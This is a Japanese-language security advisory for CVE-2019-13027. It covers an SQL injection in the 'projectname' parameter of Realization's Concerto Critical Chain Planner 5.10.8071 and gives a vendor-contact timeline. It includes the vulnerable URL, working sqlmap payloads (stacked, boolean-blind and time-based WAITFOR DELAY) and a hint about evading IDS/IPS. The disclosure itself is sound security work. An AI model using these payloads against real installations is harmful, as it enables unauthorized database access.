
CVE-2019-13027 開示の詳細
CVE-2019-13027 開示の詳細
ベンダー連絡のタイムライン: 1st July 2019 -> 応答なし、メールの返信なし。
4th July 2019 -> 応答なし、メールの返信なし。
8th July 2019 -> メール送信、Github 作成。
11 July 2019 -> ベンダーからの応答なし。脆弱性を開示。
[脆弱性タイプ] SQL インジェクション [影響を受ける製品コードベース] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - バージョン: 5.10.8071 (5.x ブランチの他のバージョンも影響を受ける可能性があります。>他のブランチではテストできません)
[影響を受けるコンポーネント] Realization Concerto Critical Chain Planner (別名 CCPM) 5.10.8071 にはいくつかの重大なセキュリティ問題があり、少なくとも taskupdt/taskdetails.aspx ウェブページで "projectname" パラメータを介した SQL インジェクションがあります。
[攻撃タイプ] リモート
[攻撃ベクトル] アプリケーションには多くの反射型 XSS/CSRF(例:checklist/checklist)がありますが、難しいのは SQL インジェクションです。SQL Server のバージョンや IDS/IPS によっては、いくつかの改変が必要です。
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) は存在し、有効である必要があります。残りのパラメータをファズする(または実際のリクエストを使用する)。 foo には XSS もあります。
検出された SQL(SQLMAP からのペイロード) パラメータ: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[製品のベンダー] REALIZATION - https://www.realization.com/